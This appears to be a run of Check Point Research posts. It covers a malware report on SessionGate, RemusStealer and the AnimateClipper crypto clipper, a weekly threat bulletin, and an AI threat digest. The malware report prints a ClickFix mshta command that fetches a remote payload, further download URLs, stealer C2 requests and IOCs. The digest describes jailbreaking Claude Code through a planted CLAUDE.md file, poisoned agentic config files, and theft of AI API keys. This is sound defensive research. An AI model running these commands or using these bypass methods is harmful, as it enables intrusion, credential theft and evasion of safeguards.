Implication: per-client, one-time keys and strong server-side gating

In controlled experiments, we repeatedly observed that the “CRC” C2 endpoint can return different values across requests for the same version=<hash>. This behavior aligns with the broader design of the campaign:

  • The stage-2 payload appears to be generated per client session, and
  • DLL #2 cannot be decrypted unless the correct c1 output is obtained for the matching build.

Based on traffic captures and repeated retrieval attempts, our working assessment is that the “CRC” C2 likely implements one-time key release semantics and additional gating tied to victim context, such as the originating IP address / session state. In practice this means:

  • the correct key material may be released only once for the intended victim session, and
  • subsequent requests (or requests from a different IP) may be answered with a valid-looking but non-functional random string, causing the stage-2 loader to decrypt DLL #2 into garbage rather than a valid PE image.

This design significantly complicates research. Even when an analyst captures a full redirect chain and obtains a sample quickly, the server-side constraints can prevent reliable reproduction of the key exchange needed to decrypt and analyze the final payload (DLL #2).

DLL#2 – Decrypted Payload: The “Installer/Offer Framework” Module

After we succeeded in capturing a clean end-to-end delivery run and decrypting the embedded modules, we obtained a second-stage DLL that implements the real business logic: tracking, configuration retrieval, payload selection, download, and silent execution.

This section describes that decrypted module and its capabilities.

In this sample, we observed the same code patterns and obfuscation techniques as in all previously analyzed modules, which clearly indicates that they belong to the same malware family.

The decrypted payload is best described as a network-controlled installer/bundler framework. It is designed to look and behave like a legitimate installer when observed superficially, while quietly performing a server-driven download-and-execute workflow in the background.

Importantly, we did not observe stealer or RAT behavior in this module: there is no evidence of credential theft, browser database scraping, keylogging, or interactive remote control. Instead, the module is intended for configurable delivery (server-controlled payload URLs), and silent installation of additional software.

From a defensive perspective, this still makes it high-risk. Any component that can fetch configuration from a remote server and then download and execute binaries on demand is a delivery primitive that can be abused to distribute malware.

A quick map of the core workflow

At a high level, the DLL implements the following pipeline:

  1. Build encrypted request.
  2. Retrieve encrypted config from C&C server (appmakingcenter[.]com in the analyzed sample).
  3. Decode config into key/value table, fetch download URL.
  4. Download payload.
  5. Execute silently via cmd.exe .
  6. Send telemetry/tracking events

The implementation is structured around a small set of reusable building blocks:

  • an encrypted “panel protocol” over HTTPS,
  • a configuration decoder and parser,
  • downloaders,
  • a silent process launcher,
  • multiple tracking/telemetry helpers.
Figure 12 – C&C domain, and endpoints in the decrypted strings.

What software does it appear to install?

The decrypted module contains many product-facing strings (installer UI text, product names, and expected post-install executable paths under AppData\\Local\\Programs\\...). At first glance, this looks like a hardcoded “bundle portfolio” (PDF Spark, PDF Proton, PDF Ignite, PDF Skill, Document Sparkle, NibblrAI, PCPooch). However, as we described above, the DLL is a multi-product installer shell driven by server configuration, not a collection of fixed download links.

Figure 13 – The list of products that can be installed.

Concretely, the module retrieves an encrypted backend configuration, decodes it into an internal key/value table, and then:

  • uses a numeric product identifier from the table (config key 22) to select which product branding/UI texts to display, and which expected executable path to use for post-install launch (via CreateProcessW);
  • uses a download URL from the same table (config key 11, PRODUCT_DOWNLOAD_URL) as the input to its WinINet downloader.

This design explains why you can see many product names and installation paths in the DLL while not seeing their download URLs as plaintext: the URLs are supplied dynamically by the backend.

Finally, if the backend config is missing key 11, the parser initializes PRODUCT_DOWNLOAD_URL to a hardcoded 7-Zip installer URL (https://www.7-zip.org/a/7z2301-x64.exe), which can be overridden by a full server response.

Case 2: RemusStealer

In the second case we analyzed, the TDS redirection chain ends with a landing page that provides a link to download a password-protected ZIP archive and the password required to open it.

Figure 14 – Link for downloading a password protected archive.

The archive is approximately 14 MB, but after extraction it contains a single executable whose on-disk size is about 850 MB. The file is artificially inflated by large zero-filled padding: the actual non-zero content is roughly 32 MB once the padding is removed.

This inflation is a practical evasion technique. Oversized binaries can slow down or break automated processing (static unpacking, AV scanning pipelines, sandbox analysis) and can also bypass tooling or policies that impose file-size limits or timeouts during analysis.

The executable itself is a first-stage loader written in Go. It contains an embedded malicious payload in .rdata that is decoded at runtime using a simple transform, and is executed via manual PE mapping.

Payload: Remus Stealer

The embedded second-stage payload is a C2-controlled infostealer marketed as Remus (a MaaS stealer). The first public listing we observed for “Remus” was posted on a Russian-language underground forum by a user named RemusStealer on February 12, 2026.

According to the vendor advertisement, Remus is positioned as a subscription product (two tiers advertised at $250 and $500) with a focus on broad browser and extension collection, a custom exfiltration protocol with encryption, and heavy use of low-level OS interaction (“system calls”).

Figure 15 – RemusStealer panel screenshot (from Remus ads)

RemusStealer implements the following functionality:

  • C2-driven collection (“tasking”): the server defines what is collected per run by sending encrypted JSON tasks; multiple tasks can be executed sequentially until the server signals completion.
  • Browser data theft:
    • Chromium family: History, Login Data, Login Data For Account, Network\\Cookies, Web Data
    • Firefox/NSS profiles: key4.db, cert9.db, cookies.sqlite, logins.json, formhistory.sqlite, places.sqlite, prefs.js, extensions.webextensions.uuids
    • Chromium key material: extracts the master key from Local State via DPAPI (CryptUnprotectData) and uploads it as a separate /Key artifact.
  • Extension-driven theft: the server can pass an explicit list of extension targets (extensions[] objects with {name, path}), allowing selective collection.
  • File system search + exfiltration: server-controlled search rules (path, mask, depth, size limit, link handling) with %ENV% expansion (e.g., %APPDATA% paths).
  • Registry reconnaissance: server-controlled queries of arbitrary path/value pairs, with HKCU-relative support and WOW64 view retry logic.
  • Clipboard theft: captures CF_UNICODETEXT, exfiltrated as Clipboard.txt (collected once per run).
  • Screenshot capture: supported and exfiltrated as Screenshot.bmp when enabled by an internal flag (not unconditional in this build).

Operationally, this architecture gives the operator fine-grained control over collection scope. For example, the backend can define which browser extensions to target, which file name patterns to search for, which registry values to query for environment profiling, and so on.

Tasking protocol overview

The binary contains an encrypted C2 list that is decrypted at runtime. In the analyzed sample, the decrypted C2 endpoints were:

  • http://buccstanor[.]pics:28313 (primary)
  • http://baxe[.]pics:48261 (fallback)

The stealer polls the C2 using HTTP POST requests that include an access_token and an incrementing step counter. The requests use a Firefox browser User-Agent string, to blend in with normal browser traffic:

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 56
Host: baxe.pics:48261

access_token=57fe0587-863c-432d-9f4b-bf785a9560e8&step=1

Each server response is an encrypted JSON object with keys:

  • type — numeric command type (parsed as a number and used as an integer selector)
  • data — command parameters (object or list, depending on type)
  • name — base64 string used by type=0
  • extensions — list of {name, path} objects used by type=3 and type=4
{
  "type": <number>,
  "data": ...,
  "name":"<base64>",
  "extensions": [ {"name":"...", "path":"..."}, ... ]
}

Task responses are delivered as encrypted JSON. After decoding, entries resolve into a label and extension identifier, with occasional control flags (sync, indb) used by the malware logic.

A decrypted example task instructing the stealer to collect Chrome browser extension data looks as follows:

{
  "type":3,
  "extensions": [
    { "name":"Password Managers/1Password", "id":"aeblfdkhhhdcdjpifhhbdiojplfjncoa" },
    { "name":"Password Managers/Bitwarden", "id":"jbkfoedolllekgbhcbcoahefnbanhhlh" },
    { "name":"Wallets/MetaMask", "id":"nkbihfbeogaeaoehlefnkodbefgpgknn", "indb":true },
    { "name":"Wallets/Phantom", "id":"bfnaelmomeimhlpmgjnjophhpkkoljpa" },
    { "name":"2FA/Authy", "id":"gaedmjdfmmahhbjefcbgaolhhanlaolb" }
  ]
}

Notably, the identifiers are not limited to Chrome Web Store-style IDs: the list also contains email-like IDs (e.g., webextension@…) and GUID-style identifiers, suggesting the operator’s targeting list is designed to cover multiple browser ecosystems and packaging schemes.

The agent executes tasks in a loop until the server returns a stop command.

Implemented commands

Task typePurposeExpected fieldsWhat the stealer does
0File-system search + exfiltrationdata contains: path, mask, depth, size, link; plus top-level name (base64 label). path supports %ENV% expansion.Expands %ENV% paths, traverses directories with filters/limits, collects matching file contents, packages results, and uploads them to C2.
1Reserved / no-op (this build)type onlyNo task handler is executed. The agent performs only the standard loop housekeeping and proceeds to the next step.
2Registry reconnaissance (arbitrary value queries)data is a list of objects with: path, value, nameOpens keys via native NT registry APIs, queries requested values, retries using an alternate WOW64 view when needed, supports HKCU-relative paths, and returns results as labeled artifacts.
3Chromium-oriented collection + extension-driven logicUses extensions ({name, path}) and additional control flags from data (e.g., history, plus short flags observed as indb/sync).Collects Chromium artifacts (History, Login Data, Cookies, Web Data), extracts key material from Local State via DPAPI (CryptUnprotectData), and uploads the decrypted blob as a /Key artifact.
4Firefox/NSS profile discovery + profile theftUses extensions ({name, path})Searches for profile directories by checking for \\key4.db; when found, collects the Firefox/NSS artifact set (including key4.db, cert9.db, cookies.sqlite, logins.json, places.sqlite, prefs.js, extensions.webextensions.uuids) and uploads them.
5Stop / end of taskingtype onlySignals completion: the agent exits the task loop and proceeds to its post-task upload sequence before terminating.

Targets: crypto wallet, password managers, 2FA extensions

In the captured C2 traffic, the stealer received a list of 332 browser extension identifiers in encrypted task responses.

The targeting is heavily skewed toward cryptocurrency wallets and credential/secret storage:

CategoryUnique targetsWhat’s at risk (high level)
Wallets220Wallet extension state (accounts/addresses, encrypted vaults, session artifacts; exact contents depend on the wallet)
Password Managers77Password manager extension data (vault metadata, sessions, potential export artifacts depending on product/state)
2FA / TOTP18OTP/2FA companion extensions and related data (e.g., seeds/exports if present)
Notes11Notes/clipper extensions (note content, clip data)
Payments6Payment/checkout extensions (session / account-related artifacts)

Representative high-signal targets from the decoded list include:

Password managers: 1Password, Bitwarden, LastPass, Dashlane, Keeper, RoboForm, NordPass, Proton Pass, KeePassXC, Zoho Vault

Crypto wallets: MetaMask (multiple identifiers observed), Rabby Wallet, Coinbase Wallet, Trust Wallet, OKX Wallet, Binance Wallet, Bitget Wallet, Phantom (Solana), Solflare Wallet (Solana), Keplr / Cosmostation / SubWallet (Cosmos/Substrate ecosystems), TronLink, Exodus, Ronin Wallet, Tonkeeper / MyTonWallet, Yoroi (Cardano), UniSat Wallet (Bitcoin ecosystem), Suiet (Sui) / Pontem (Aptos)

2FA: Authy, 2FAS, multiple “Authenticator / TOTP / Web2FA” extensions.

Case 3: ClickFix, and a Crypto Clipper with On-Chain C2 Resolution

In this TDS branch, the user is ultimately led to a ClickFix-style phishing page (processing-in-progress-x4.t3.storage[.]dev), after which the infection chain proceeds to silently install a cryptocurrency clipper malware that some vendors identify as AnimateClipper.

Figure 16 – A phishing page using the ClickFix technique to trick the victim into silently running a malicious downloader.

The page that imitates a Cloudflare verification screen and instructs the user to run:

C:\Windows\SysWOW64\mshta.exe https://185.0xA1.0xFB[.]58/navy.7z

mshta.exe is a built-in Windows utility intended to run HTML Applications (HTA). It is often abused by threat actors because it can execute script-based content directly from a remote URL using a system binary already present on the machine.

The object fetched from https://185.0xA1.0xFB[.]58/navy.7z is not a normal 7-Zip archive. Its beginning contains an HTA page with obfuscated VBScript, which mshta.exe executes. The appended archive content is benign decoy data and does not participate in the infection chain.

The VBScript retrieves the next stage from:

http://194.150.220[.]218/4SLEYpfAk57hGubo/fo0suc2ki2.rtf

Despite the .rtf extension, this resource is a heavily obfuscated PowerShell script. After deobfuscation, we found that it reconstructs an additional PowerShell stage in memory and uses an RC4-based routine to decrypt the next payload.

That stage then downloads:

https://cdn-1415.brightcanvas[.]digital/fo0suc2ki2.rtf

This file also does not match its extension. In the observed chain, it is a ZIP archive containing a bundled Python environment, third-party libraries, Node.js modules, and a large heavily obfuscated Python script stored in node_modules.asar. Despite its name, node_modules.asar is not an Electron ASAR archive, but a Python loader disguised to blend in with the package contents.

The obfuscated script embeds a large shellcode blob directly in its body and launches it from memory. It copies the shellcode into a buffer, changes the memory protection to executable, and transfers execution to it via ntdll!LdrCallEnclave. In the sample we analyzed, the shellcode is executed in-process, inside the current bundled Python interpreter.

Once running, the shellcode acts as an in-memory loader for the next stage. It decrypts and decompresses an embedded payload container and manually maps the resulting PE payload into the same process memory. In other words, node_modules.asar is not a passive archive or Electron artifact, but the actual Python-based launch stage that executes shellcode and hands off execution to the next payload without writing the unpacked PE to disk.

Final payload: crypto clipper with on-chain C2 resolution

At a high level, the final payload is a clipboard-hijacking crypto clipper: it continuously monitors the clipboard for cryptocurrency wallet strings, identifies the wallet format locally, replaces the copied address with one of multiple attacker-controlled wallet addresses embedded in the sample, and writes the modified value back to the clipboard. In practice, this means a victim can copy a legitimate wallet address, paste it moments later, and unknowingly send funds to the attacker instead.

When executed, AnimateClipper first resolves its C2 by querying a smart contract over the public BNB Smart Chain Testnet JSON-RPC endpoint. The sample issues the following request:

POST https://data-seed-prebsc-1-s1.binance.org:8545/
{"id":1,"jsonrpc":"2.0","method":"eth_call","params":[{"to":"0x6936edc505501EBB2F202C985a021a06f1c10C9E","data":"0x3bc5de30"},"latest"]}

At the time of our analysis, the contract response resolved to the C2 domain:

kr.hugo-lapp.co

The malware uses HTTPS to communicate with the resolved C2 server. In the analyzed build, the observed logic includes periodic refresh check-ins and a second request format intended to report address-replacement activity. The replacement wallets themselves are fully embedded in the binary.

The hardcoded replacement addresses observed in the analyzed sample include:

0xA1E50DaF64fb2B342A64d848E396700962acC2d0
1PbWWqgKDBDorh525uecKaGZD21FGSoCeR
31kwGkJP9xM26cnQJLpe1CH6pjSt4DEDz2
32Epo1K92Xzo6Hayq1Fmkj21x4fUk7JZT7
bc1qcg5sx6a6evx5ls4gj6nh8d0jtamh89n2y473dr
bc1pqn73hlel3mmnza0kfl2alwkkgkapeeknufgtysll8fs2z4umdf0qpvus9q
ltc1qk437ykzdxms9k9wh5vhd7aalsv0tfx6r39rrtv
LV9AYZKQEg891crnof7PFK6u77noVM4Y45
MG1FerSxboiwjhvU2cv4n34pXz5FpC88p4
TNf4nzc6x6fZrBMLMaZZGV1SbCjShDqbaQ
r9yMnTm4NSzvG9rrwjM2ec8xZgh1cafXH8
cosmos1k5xu6njlc90r92gdwvtfjh826jduw7ptmry0q8
UQDvDUxFShoWWbHougyHjr0tFz3E38fX8e0bnTUpya-P0mXW
DH9W9S6mSSBsGeiSstgsGdiREZupQbZf9C
RRkUSs6V3Eu6gxjGDbGzcS99F5WyKtggsw
XvUreW3ZjMcDuMTowd1BZsK9CYJdk7eKJw
RMh4hfsi84LdbS4uS3jaSaNccc8kartkDJ
XALFSI6ETIZJH2N5CFT2CFOKPFDVDTZUVR7Q3L26UG74SWYGMY6X7MA46Q
XpY2GAXeKJwxSqF87BbPzD68Woy5trj8iKS1PPM
EME9M9cSy9FvfHvcx2gMPkp1H5Dj4YaKufPRsAyon8Tf
qphu2urfykunh5l42retl4aqw6xnfjkyjvcy6gjqrs

We also reviewed incoming transactions to the wallet addresses embedded in this sample. In the dataset we analyzed, the earliest inbound payments were recorded in July 2025, with the first observed transaction dated July 12, 2025. This indicates that the operation has likely been active for a prolonged period and suggests that the TDS-driven infection chain we observed may be only one of several distribution paths used to deploy the malware. While the observed on-chain inflows are modest, they nevertheless show that the embedded wallets received real funds.

Conclusion

This campaign is a reminder that “looking official” is not a meaningful security signal. The entry sites mimic legitimate open-source project portals, preserve real GitHub links to pass quick visual checks, and then use click interception to route the first download click into a gated TDS stack. From the user’s perspective, the path is deceptively simple: top Google result, polished “project” site, download. Under the hood, that single click can become a non-deterministic redirect chain that the victim never agreed to and cannot easily audit.

One of the most striking aspects of the campaign is the SessionGate branch used to deliver PUA. Its combination of server-side registration, one-time-style key release, per-session payload generation, and heavy obfuscation goes far beyond what is typically seen in commodity bundler chains. In practice, these counter-analysis measures make even obtaining the final payload unusually difficult for researchers. While such aggressive gating likely reduces overall delivery efficiency, at this campaign’s scale it is a rational tradeoff for the operators: it also reduces analyst visibility, delays detection, and helps the activity remain under the radar for longer. This is reflected in public telemetry — despite thousands of VirusTotal submissions for the initial loader and hundreds of related intermediate samples, we did not identify the final payload on VirusTotal.

Even if the upstream traffic source is not intended to distribute malware, repeated diversion of users into gray and malicious chains strongly suggests insufficient partner vetting and weak abuse prevention across the supply path. Mechanisms such as sending users somewhere other than the visible link target and handing sessions off to third-party infrastructure outside the original platform’s control are, at minimum, hallmarks of unfair and deceptive traffic practices, not transparent advertising.

More broadly, the embedded TDS layer behaves like a broker between ecosystems: it allows downstream operators to selectively receive only the sessions they want, based on GEO, browser fingerprinting, anti-bot checks, and capping. That makes attribution harder and accountability more diffuse — the impersonation operator does not need to be the malware author to enable malware delivery at scale.

Protections

Check Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics, file types, and operating systems and protect against the attacks and threats described in this report.

IOCs

TypeIndicatorDescription
SHA-256598b023e56c45b19173e8f96c1c88036d732fec305cf6bf1b9cf4dbe304beb7fSessionGate Stage 1
SHA-25674091f5a8746a1c68d73e1fc1e4e1ff514632ee3f632a8b306f35dabae2d2b64SessionGate Stage 1
SHA-25615e6df0c95f2147952308e640d55270e9d097639eaebb34d4b352415f1c6bcebSessionGate Stage 1
SHA-2563bb92771e287aa0a8bdd8e5b5bb697427223eaefded3d9b64b5d5c32ad40f3c2SessionGate Stage 1
SHA-256cbad672d9bd06ce91ce465d049e50696fbaec9d209ca0ab1fd814d993d04bc9bSessionGate Stage 1
SHA-2564cdb1f7ac502289119f7f8256f00baaa994e6ecfb4000dcf5e1c46073508fcb3SessionGate Stage 2
SHA-256cbad672d9bd06ce91ce465d049e50696fbaec9d209ca0ab1fd814d993d04bc9bSessionGate Stage 2 DLL #1
SHA-256ce0888df5e28716432013a8ae002437bd3e993fbe8362c5ff9efbddabfe0ab77SessionGate Stage 2 DLL #1
SHA-25626f2abfc254a59c2386dd46dca16744f7147a0f0366cb6008e1d53219175f44cSessionGate Stage 2 DLL #2
SHA-256e6a1a428a7c09c9946f7c0179d89b263f442dc3208b5144a9146c200e4185bd6AnimateClipper
SHA-25687361ba2bb412dcf49f8738f3b8b9b7dccb557ad2e76ea8d98ffa5b098ae3886AnimateClipper
SHA-25639dc2327fe1e5a56ac5ad9dc02f0386cff3d83dcfdc558cacba42ebb9dcc5ec2RemusStealer
SHA-2562e842eab0c16ddd1a2ec4a56610adb58d115b65a1e08e9b67e7e375f8eed0873RemusStealer
Domainappfreshstart[.]comSessionGate
Domainappgetonline[.]comSessionGate
Domainwebinnosetup[.]comSessionGate
Domainappmakingcenter[.]comSessionGate
Domainyourfastcrc[.]comSessionGate
Domainmobileversioncrc[.]comSessionGate
Domainwebcrcprove[.]comSessionGate
Domainintegritycrc[.]comSessionGate
URLhttp://buccstanor[.]pics:28313RemusStealer
URLhttp://baxe[.]pics:48261RemusStealer
URLhttp://217.156.122[.]75:1378RemusStealer
URLhttp://intem[.]lat:9592RemusStealer
URLhttp://ropea[.]top:28313RemusStealer
URLhttp://forestoaker[.]com:6290RemusStealer
URLhttp://buccstanor[.]pics:48261RemusStealer
URLhttp://94.231.205[.]229:28313RemusStealer
URLhttp://gluckcreek[.]online:48261RemusStealer
URLhttps://185.0xA1.0xFB[.]58/navy.7zAnimateClipper
URLhttp://194.150.220[.]218/4SLEYpfAk57hGubo/fo0suc2ki2.rtfAnimateClipper
URLhttps://cdn-1415.brightcanvas[.]digital/fo0suc2ki2.rtfAnimateClipper
Domainkr.hugo-lapp[.]coAnimateClipper
Domainio.hugo-lapp[.]latAnimateClipper
Domaincw.hugo-lapp[.]latAnimateClipper
Domainst.hugo-lapp[.]latAnimateClipper
Domaintd.hugo-lapp[.]latAnimateClipper
Domainfd.hugo-lapp[.]latAnimateClipper
Domained.hugo-lapp[.]latAnimateClipper
Domainflame-guard[.]ccAnimateClipper
Domaincarlessclapped[.]comAnimateClipper

The post Impersonation, Click Hijacking, and TDS: Inside a Malware Distribution Ecosystem appeared first on Check Point Research.

1st June – Threat Intelligence Report

By: urias
1 June 2026 at 16:43

For the latest discoveries in cyber research for the week of 1st June, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • Carnival Corporation, a global cruise line operator, has confirmed a data breach affecting nearly 6 million people after attackers used social engineering to compromise an employee account. Exposed information may include names, contact details, dates of birth, and government identification numbers.
  • Charter Communications, a US telecommunications provider operating under the Spectrum brand, has suffered a data breach by ShinyHunters group. Analysts report that 4.9 million email addresses were exposed, with names, phone numbers, physical addresses, and a subset of employee directory records.
  • Lithuania’s Centre of Registers, the state agency responsible for property and legal entity records, has disclosed a data breach affecting more than 600,000 records. Attackers reportedly misused institutional login credentials to access names, dates of birth, national identification numbers, and property-related data.
  • Station Casinos, a major Las Vegas casino operator owned by Red Rock Resorts, has disclosed a breach after an unauthorized third party accessed a single employee account and associated files. The company began notifying affected individuals on May 21 and said business operations were not affected.

AI THREATS

  • Researchers profiled GREYVIBE, a Russia-aligned group using ChatGPT and Google Gemini to accelerate phishing, malware development, and post-compromise activity against Ukrainian targets. The campaign uses spear-phishing, fake CAPTCHA pages, and decoy websites to deliver PhantomRelay on Windows and FallSpy on Android.
  • Researchers unveiled an AI-driven influence and fraud campaign run by a Russian-speaking actor behind a MAGA-themed Telegram channel with 17,000 subscribers. The operator bypassed Gemini safeguards to automate propaganda and credential theft, used stolen API keys, cracked WordPress accounts, and drained a crypto wallet.
  • Researchers identified an AI-generated malicious npm package, mouse5212-super-formatter, that steals developers’ files by scanning a local directory and uploading data to a GitHub repository using a hardcoded private token. The package recorded at least seven exfiltration events and 676 downloads.

VULNERABILITIES AND PATCHES

  • Check Point announced a Jumbo Security Release based on large-scale AI-driven code scanning across the products. The release addresses vulnerabilities in Check Point security gateways, including CVE-2026-48131 and CVE-2026-48132. The vulnerabilities were not exploited in the wild.

Check Point IPS provides protection against these threats (IKE Unsigned Underflow (CVE-2026-48131), IKE Improper Length Validation (CVE-2026-48132))

  • CVE-2026-0257, a PAN-OS GlobalProtect authentication bypass which was fixed earlier this month, is now being exploited against unpatched Palo Alto Networks devices. Attackers are using forged authentication override cookies to create unauthorized VPN sessions, potentially giving them access to internal networks. CISA added the flaw to its Known Exploited Vulnerabilities catalog on May 29.
  • A critical remote code execution flaw has been disclosed in Gogs, a popular open-source self-hosted Git service, with a CVSS score of 9.4 and no patch available. An authenticated user can abuse rebase merging to execute commands, risking repository access and cross-tenant data exposure. The vulnerability remains unpatched by the developer for more than two months.

Check Point IPS provides protection against this threat (Gogs Remote Code Execution)

  • Ghost CMS vulnerability CVE-2026-26980 is actively being exploited in attacks that use SQL injection to steal Admin API keys and alter website pages. At least two groups have targeted more than 700 sites using fake Cloudflare checks to deliver data-stealing malware.

Check Point IPS provides protection against this threat (Ghost SQL Injection (CVE-2026-26980))

THREAT INTELLIGENCE REPORTS

  • Researchers attributed a destructive campaign against LA Metro to an Iran-linked intelligence operation using the Ababil of Minab persona. LA Metro confirmed an intrusion involving wiped servers, and analysts linked additional transit and technology attacks to Black Shadow infrastructure.
  • Researchers observed renewed Grandoreiro banking malware campaigns targeting Portuguese banks and organizations across Spain, Mexico, and Latin America. The attacks begin with phishing and using DLL side-loading or malicious scripts, then abuse cloud services to hide traffic while stealing credentials and displaying fake banking overlays.
  • Researchers uncovered GHOST STADIUM, a fraud network cloning FIFA-related websites across more than 300 active domains ahead of the 2026 World Cup. The operation steals login credentials and payment data, locks fans out of accounts, and is promoted through Facebook ads.
  • Researchers exposed JINX-0164, a financially motivated group targeting cryptocurrency organizations through recruiter-themed social engineering and macOS malware, including AUDIOFIX and MINIRAT. The campaigns moved from compromised developer laptops into code repositories and build systems, creating supply chain compromise risk.

The post 1st June – Threat Intelligence Report appeared first on Check Point Research.

AI Threat Landscape Digest March-April 2026

26 May 2026 at 12:09

Executive Summary

During the March–April 2026 reporting period, AI use in offensive operations advanced from development and planning to real-time operational deployment. Multiple independent cases, involving individual criminal actors, mass exploitation platforms, ransomware groups, and state-sponsored espionage, show evidence of commercial AI models executing autonomous attack workflows across extended campaigns.

Key findings:

  • AI-orchestrated attacks have progressed from experimental, state-sponsored use to in-the-wild criminal deployment. Multiple criminal operations relied on commercial Claude Code as a persistent operational tool in multi-week campaigns.
  • Agentic configuration files are being weaponized as persistent jailbreak vectors. Hooks, project-level files, and settings files abuse the operational control level and redefine the model behaviour at the architecture level.
  • AI-enabled attack platforms are commercializing AI capabilities. Operators can now buy access to platforms where the AI pipeline, model selection, jailbreak, and delivery mechanisms are embedded in the product.
  • AI provider credentials have become a high-value target. As commercial AI services become central to offensive operations, API keys for Anthropic, OpenAI, Groq, Mistral, and HuggingFace are harvested at scale from compromised .env files, providing access without registration and resilience against provider attempts to revoke this access.

AI as Live Attack Operator

AI selection considerations

Underground forum discussions still show actors debating the use of commercial models, dedicated jailbreak services, or locally hosted open-source models, reflecting the lower-skill end of AI adoption. More advanced actors combine tools pragmatically: from commercial AI models, open or uncensored models where commercial providers restrict output, and custom automation pipelines that perform repetitive analysis at scale. Tasks are systematically broken down into smaller sub-requests that present a lower apparent risk profile.

Figure 1 - Figure 1: Forum user suggesting commercial models are effective and restrictions easily removable
Figure 1 – Forum user suggesting commercial models are effective and restrictions easily removed.
Figure 2 - Figure 2: Another user recommends self-hosting open source models to avoid monitoring
Figure 2 – Another user recommends self-hosting open-source models to avoid monitoring.

Forum users further discuss and share methods and alternatives to avoid mainstream-provider safety controls by mixing open-weight Chinese frontier models, privacy-routed proxies, and explicitly uncensored services.

Figure 3 - Figure 3: User sharing a non-restricted/monitored AI assistant recommendation table.
Figure 3 – User sharing a non-restricted/monitored AI assistant recommendation table.

The Mexico Breach

When Anthropic disclosed GTG-1002, a Chinese nexus campaign using Claude Code for cyber espionage, in November 2025, this was seen as an experimental, state-sponsored development. The disclosure carried no IoCs and was therefore disputed by independent researchers, and the activity was detected only through Anthropic’s own API monitoring. The Mexico breach, which occurred a few months later, demonstrates similar architecture in operational, financially motivated criminal use, at scale, and with a recovered forensic record.

Between late December 2025 and mid-February 2026, a single operator compromised nine Mexican government agencies. Researchers documented the case after recovering materials from attacker-controlled VPS servers. Details include the operational record: 1,088 attacker prompts generating 5,317 AI-executed commands across 34 sessions.

The breach scope was significant: tax records, civil registry data, vehicle records, patient files, and electoral infrastructure were affected. However, an even more important lesson is how the campaign was run.

The operator built a dual AI workflow. Claude Code served as the interactive exploitation assistant, helping advance access, write exploits, build tunnel chains, map victim environments, and escalate privileges. In parallel, harvested server data was processed through GPT-4.1 for automated intelligence analysis. The GPT output was then used to task new Claude sessions.

As we highlighted in our previous review, the agentic infrastructure itself was exploited to bypass the model’s safety restrictions. At the start of the campaign, Claude refused to execute requests which it correctly identified as offensive cyber activity. The attacker then changed tactics. Instead of asking Claude to generate malicious content directly, they pasted a large penetration-testing cheatsheet into CLAUDE.md in the project root, the file Claude Code automatically loads as persistent project context at the start of every session. From that point on, subsequent sessions inherited the rules and techniques in that file. The attacker did not need to repeat the jailbreak as the behavior persisted through the project configuration layer. After gaining root on a civil registry server, the model’s actions in subsequent sessions were consistent with the persistent cheatsheet, including unprompted post-exploitation steps such as shadow file extraction and timestamp cleanup.

Bissa Scanner

A second documented case, Bissa Scanner, was published in April 2026, after researchers identified an exposed operator server. Bissa is a modular mass-exploitation platform built around React2Shell (CVE-2025-55182), with 900+ confirmed compromises across millions of scanned Next.js endpoints and an archive of 30,000+ distinct .env filenames recovered from operator-controlled S3 storage. The operation has been running since September 2025. Here, AI is positioned one step back from the exploitation layer: Claude Code and OpenClaw (running claude-sonnet-4-6, with a Telegram bot for triage alerting) served as the operator’s working environment for reading the scanner codebase, troubleshooting, refining the collection pipeline, and prioritizing high-value access. No jailbreak was documented and commercial Claude was accessed through the standard API.

Bissa harvested .env files specifically for AI provider credentials (Anthropic, OpenAI, Groq, Mistral, OpenRouter, HuggingFace, Replicate, DeepSeek). AI provider credentials have become a deliberate target, valuable enough for sophisticated operators to enumerate and harvest at scale alongside conventional credential theft. These credentials are likely intended to be used in future offensive criminal activity and attribute it to the legitimate account holder instead of the attacker.

Agentic Configuration Files: A Persistent Attack Surface

The previous section demonstrates the use of agentic configuration files to override safety features in their own AI sessions. The same inheritance mechanism can be used in reverse: an attacker plants malicious agentic configuration files in a repository, and an innocent developer uses the project and becomes the next victim.

A recent CPR report documented three exploitation paths and disclosed two (now patched) CVEs. CVE-2025-59536 exploits Claude Code’s Hooks feature (hooks, .claude/settings.json), executing arbitrary commands before the developer can read them. A parallel path uses .mcp.json to trigger the MCP server startup, bypassing the consent dialog entirely. CVE-2026-21852 redirects ANTHROPIC_BASE_URL to a malicious proxy that intercepts authorization headers and potentially steals API keys, granting read/write access to the entire team Workspace before any trust prompt appears. The attack vector in all three cases is “supply chain”, a malicious settings file embedded in a pull request, honeypot repository, or compromised codebase that results in system compromise on the developer machine.

The underlying issue of using agentic configuration files as the attack surface and supply chain is not specific to Claude. The potential attack surface is architectural and may apply equally to Cursor (.cursorrules), Windsurf (.windsurfrules), and GitHub Copilot Workspace (.github/copilot-instructions.md).

AI-Powered Fraud at Scale: EvilTokens

EvilTokens represents a category of offensive tooling offered for sale: a commercial Phishing-as-a-Service (PhaaS) platform, built using AI and operating an LLM pipeline as a runtime component of the attack. A buyer with no AI knowledge can purchase access to a fully integrated pipeline in which model selection, jailbreak, and output delivery are handled at the platform level.

EvilTokens runs a multi-stage attack flow. Device-code phishing pages impersonating Adobe, DocuSign, and SharePoint harvest Microsoft OAuth tokens. The AI pipeline then activates these tools:

  • Via Groq, llama-3.1-8b-instant ingests up to 5,000 emails in 250-email batches, extracting account numbers, routing numbers, wire amounts, payment deadlines, and reporting hierarchies.
  • Also via Groq, llama-3.3-70b-versatile synthesizes the intelligence, generates BEC (Business Email Compromise) drafts tailored to the victim’s writing style, and assigns a BEC score.
  • gpt-4o-mini translates stolen emails for non-English-speaking operators.
  • The SMTP Sender delivers the output with rotating SMTP pools, header fingerprint randomization, DKIM signing, and CSS randomization.

The researchers assessed with high confidence that the platform’s backend was AI-generated.

The model choices reflect deliberate task routing: Llama 3.1 8B was used for cheap high-volume extraction, Llama 3.3 70B for reasoning-heavy synthesis and stylistic mimicry, and GPT-4o-mini was reserved for translation where it has the strongest multilingual capability and where the task itself looks innocuous to provider-side monitoring. The riskiest content generation is kept on Groq-hosted open-weight models instead of on OpenAI’s more closely monitored surface.

